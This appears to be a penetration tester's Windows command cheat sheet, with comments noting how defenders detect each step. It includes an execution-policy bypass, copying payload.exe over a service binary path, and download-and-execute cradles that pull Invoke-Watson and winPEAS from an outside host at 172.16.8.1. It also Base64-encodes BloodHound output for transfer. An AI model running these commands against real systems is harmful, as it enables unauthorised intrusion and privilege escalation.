This note was written when I was still unfamiliar with the Windows environment and did not yet know how to restart the machine from the command line, copy files, import PowerShell scripts, and so on.
Import a module into PowerShell
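# Start a PowerShell process with the execution policy set to Bypass for that
# process only (-ep is short for -ExecutionPolicy). Execution policy is not a
# security boundary; from a defender's side this switch on a command line is a
# well-known indicator that process-creation and script-block logging pick up.
powershell -ep bypass
# Load PowerView either as a module ...
Import-Module .\PowerView.ps1
# ... or by dot-sourcing the script into the current scope.
. .\PowerView.ps1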
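# Copy a single file to a new path (quote destinations that contain spaces).
copy payload.exe "C:\Program Files\Service.exe"
# Copy the directory "Tools" recursively into a new directory "MyTools".
# /E copies subdirectories including empty ones; /I makes xcopy treat a
# destination that does not exist yet as a directory rather than a file.
xcopy Tools "C:\Users\Administrator\Desktop\MyTools" /E /I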
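# Rename a file in the current directory (cmd.exe "ren"; the PowerShell
# equivalent is Rename-Item).
ren Payload.exe Service.exe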
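# Download a file with certutil, a signed Windows binary. Its -urlcache
# download usage is a well-known living-off-the-land pattern that EDR/AV
# products commonly flag, so expect it to be logged.
certutil -urlcache -split -f https://example.com/example.txt example.txt
# Download with PowerShell Invoke-WebRequest (alias iwr); -O abbreviates -OutFile.
iwr -Uri "http://172.16.8.1:9005/PowerView.ps1" -O "PowerView.ps1"
# Download a script and execute it in memory without writing it to disk.
# Nothing here validates what is fetched (plain HTTP, no hash check), and the
# content is still visible to AMSI and to script-block logging (event 4104)
# at the moment iex runs it.
iex ((New-Object Net.WebClient).DownloadString("http://172.16.8.1:9005/Invoke-Watson.ps1"))
# or: fetch the raw bytes with iwr, decode them as UTF-8, then invoke.
$watson_exec = [System.Text.Encoding]::UTF8.GetString((iwr -Uri "http://172.16.8.1:9005/Invoke-Watson.ps1" -UseBasicParsing).Content)
iex $watson_exec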
Download and Execute Invoke-WinPEAS
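# Download Invoke-winPEAS and execute it in memory (WebClient download cradle).
# The script is fetched over plain HTTP with no integrity check; AMSI and
# script-block logging still see the decoded content when iex runs it.
iex ((New-Object Net.WebClient).DownloadString("http://172.16.8.1:9005/Invoke-winPEAS.ps1"))
# or: fetch the raw bytes with iwr, decode them as UTF-8, then invoke.
$winpeas_ps1 = [System.Text.Encoding]::UTF8.GetString((iwr -Uri "http://172.16.8.1:9005/Invoke-winPEAS.ps1" -UseBasicParsing).Content)
iex $winpeas_ps1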
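# Shut down immediately: /s shut down, /t 0 no delay, /f force-close running
# applications (unsaved work is lost).
shutdown /s /t 0 /f
# Restart immediately (/r instead of /s).
shutdown /r /t 0 /f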
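# Base64-encode a binary file so it can be moved as text.
# "-Encoding byte" is Windows PowerShell 5.1 syntax; PowerShell 7 replaces
# it with -AsByteStream.
[convert]::ToBase64String((Get-Content -path "20230908145747_BloodHound.zip" -Encoding byte))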
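# List local groups: the PowerShell cmdlet, then the legacy net.exe equivalent.
Get-LocalGroup
net localgroup
# List every domain group with its description (requires the ActiveDirectory
# module; "-properties *" pulls all attributes, which is slow on large domains).
Get-ADGroup -filter * -properties * | select SAMAccountName, Description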
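# Members of the local Administrators group.
Get-LocalGroupMember -Group "Administrators"
# Members of the domain "Administrators" group (ActiveDirectory module);
# objectClass shows whether each member is a user, group or computer.
Get-ADGroupMember -Identity Administrators | Select-Object name, objectClass, distinguishedName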